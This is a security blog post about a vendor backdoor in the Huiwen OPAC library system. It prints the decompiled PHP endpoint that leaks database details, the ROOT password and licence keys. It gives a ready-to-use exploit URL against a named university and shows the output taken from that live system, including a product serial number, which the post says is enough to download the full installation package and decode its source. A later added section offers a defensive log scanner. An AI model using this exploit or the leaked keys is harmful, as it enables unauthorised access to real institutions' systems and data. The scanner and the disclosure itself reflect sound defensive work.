A backdoor in the Huiwen OPAC library system leads to a source code leak

0x00 Introduction

Huiwen's libsys library OPAC system is one of the more widely deployed systems in Chinese universities; its users include Xiamen University, Nanjing University, Dalian University of Technology, Nankai University and many other schools. The system is built on Oracle + PHP, and the source code cannot be obtained through public channels.

0x01 Obtaining the code

On Huiwen's official website a number of patches can be downloaded, as shown in the screenshot.
Downloading the "OPAC important security bug update" yields a set of PHP files. The PHP is Zend-encoded and can be decoded with a DeZend tool. One of those files, /opac/ajax_libsys_view.php, contains the following code:

<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/
// common.php sets up $dbh, the Oracle database handle used below (not shown here).
require_once( "common.php" );
require_once( "../include/hwopacpwd.php" );
// Both "secrets" come straight from the request: a hard-coded password and a
// "crc" that is simply today's month+day (date("md")) reversed.
$pwd = $_REQUEST['code'];
$crc = $_REQUEST['crc'];
$date = strrev( date( "md" ) );
if ( $pwd != "huiwen_opac" || $date != $crc )
{
echo "ERROR";
return;
}
$ary = array( );
// Oracle version banner (v$version).
$strSql = " SELECT * from v\$version ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$version = $stmt->fetchall( $mode );
$i = 0;
for ( ; $i < count( $version ); ++$i )
{
$ary[] = array( "or" => $version[$i]['BANNER'] );
}
// Selected system parameters: library name, URL, licence/serial numbers, version, etc.
$strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where sys_para_code in ('01','02','14','16','17','24','47','98','99','ACS','RFID','THREE-M' ) order by 1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$para = $stmt->fetchall( $mode );
$i = 0;
for ( ; $i < count( $para ); ++$i )
{
$ary[] = array( trim( $para[$i]['SYS_PARA_CODE'] ) => str2utf8( $para[$i]['SYS_PARA_VALUE'] ) );
}
// Password of the built-in ROOT staff account.
$strSql = "SELECT password FROM lib_worker where wkr_no='ROOT' ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "RT" => $root['PASSWORD'] );
// Row counts: MARC records, item (holding) records and active readers.
$strSql = " select count(*) as cnt from marc ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "M" => $root['CNT'] );
$strSql = " select count(*) as cnt from indi_acct ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "I" => $root['CNT'] );
$strSql = " select count(*) as cnt from reader where redr_flag=1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "R" => $root['CNT'] );
// Everything collected is dumped straight into the HTTP response.
foreach ( $ary as $item )
{
print_r( $item );
echo "<br/>";
}
?>

As you can see, anyone who supplies the correct code and crc gets the whole series of SQL queries after the if check executed, and the results are returned in the response.
Taking Xiamen University as an example: http://opac.xmulib.org/opac/ajax_libsys_view.php?code=huiwen_opac&crc=8011
The crc is the month and day written in reverse: for example, today is November 8, so 1108 reversed gives 8011. The result is as follows:

Array ( [or] => Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi )
Array ( [or] => PL/SQL Release 10.2.0.1.0 - Production )
Array ( [or] => CORE 10.2.0.1.0 Production )
Array ( [or] => TNS for Solaris: Version 10.2.0.1.0 - Production )
Array ( [or] => NLSRTL Version 10.2.0.1.0 - Production )
Array ( [01] => 厦门大学 )
Array ( [02] => http://210.34.4.28 )
Array ( [14] => XMU,235010 )
Array ( [16] => 7050-7901-9735-7268-7661-9231-6348 )
Array ( [17] => Enterprise )
Array ( [24] => 5048535745485245495545207195195197180243209167205188202233185221 )
Array ( [47] => 0 )
Array ( [98] => 3174-19803-0843-1589-15002 )
Array ( [99] => 5.5.10 )
Array ( [RFID] => 2640-011-913-785 )
Array ( [THREE-M] => 2640-011-913-785 )
Array ( [RT] => )
Array ( [M] => 2332777 )
Array ( [I] => 4495757 )
Array ( [R] => 85492 )

Here, 7050-7901-9735-7268-7661-9231-6348 is the product serial number, which is enough to download the complete installation package from the official website.

After installation, the PHP source lives under hwweb; decoding it with a DeZend decryption program yields the entire source tree.
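For a site operator, the practical question is whether this endpoint has already been hit. The following Python script is an added example (not part of the original post or of Huiwen's code): it scans web server access log lines in combined log format, flags every request to /opac/ajax_libsys_view.php, and, using the date recorded in the log entry, recomputes the reversed-date "crc" exactly as the PHP above does, so that requests that would actually have passed the check can be separated from failed probes. The log lines, IP addresses and timestamps are constructed sample data, and the date check assumes the log timestamp and the PHP server's local date agree (date("md") uses the server's time zone).

```python
import re
from datetime import date
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). IPs, dates and
# user agents are placeholders, not data from the original post.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Nov/2013:10:15:02 +0800] "GET /opac/ajax_libsys_view.php?code=huiwen_opac&crc=8011 HTTP/1.1" 200 1342 "-" "curl/7.30.0"
192.0.2.11 - - [08/Nov/2013:10:16:44 +0800] "GET /opac/ajax_libsys_view.php?code=huiwen_opac&crc=1108 HTTP/1.1" 200 5 "-" "Mozilla/5.0"
192.0.2.12 - - [08/Nov/2013:10:17:01 +0800] "GET /opac/search.php?q=oracle HTTP/1.1" 200 9981 "-" "Mozilla/5.0"
192.0.2.13 - - [09/Nov/2013:00:00:31 +0800] "GET /opac/ajax_libsys_view.php?code=test&crc=9011 HTTP/1.1" 200 5 "-" "python-requests/2.0"
"""

# Minimal combined-log-format parser: client IP, request date, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<day>\d{2})/(?P<mon>[A-Za-z]{3})/(?P<year>\d{4})[^\]]*\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
     "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], start=1)}

BACKDOOR_PATH = "/opac/ajax_libsys_view.php"   # file shown in the post
BACKDOOR_CODE = "huiwen_opac"                  # hard-coded 'code' value


def expected_crc(d: date) -> str:
    """Mirror the PHP check: strrev(date('md')). 8 Nov -> '1108' -> '8011'."""
    return d.strftime("%m%d")[::-1]


def analyse_line(line: str):
    """Return a finding dict for a request to the backdoor file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != BACKDOOR_PATH:
        return None
    params = parse_qs(parts.query)
    code = params.get("code", [""])[0]
    crc = params.get("crc", [""])[0]
    req_date = date(int(m["year"]), MONTHS[m["mon"]], int(m["day"]))

    # Classify: both secrets right for that day means the SQL ran and data left
    # the server; right code but wrong crc is an unsuccessful attempt; anything
    # else is still worth noting, because nobody should touch this file at all.
    if code == BACKDOOR_CODE and crc == expected_crc(req_date):
        severity = "LIKELY_SUCCESS"
    elif code == BACKDOOR_CODE:
        severity = "WRONG_CRC"
    else:
        severity = "PROBE"
    return {
        "ip": m["ip"],
        "date": req_date.isoformat(),
        "status": int(m["status"]),
        "code": code,
        "crc": crc,
        "severity": severity,
    }


def scan(log_text: str):
    """Scan a whole log and return findings in log order."""
    findings = []
    for line in log_text.splitlines():
        hit = analyse_line(line)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:15} {f['date']} {f['ip']} code={f['code']} crc={f['crc']}")
```

A response of exactly "ERROR" is 5 bytes, so the response-size field in the log is a second, parser-independent signal: a 200 with a much larger body on this path means the queries ran. Until the vendor ships a fix, removing or blocking the file at the web server is the straightforward mitigation, since the OPAC front end has no legitimate need to expose the ROOT password or licence keys over HTTP.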

0x03 Follow-up

This vulnerability is without doubt an official backdoor. With the source in hand, the audit is now in progress...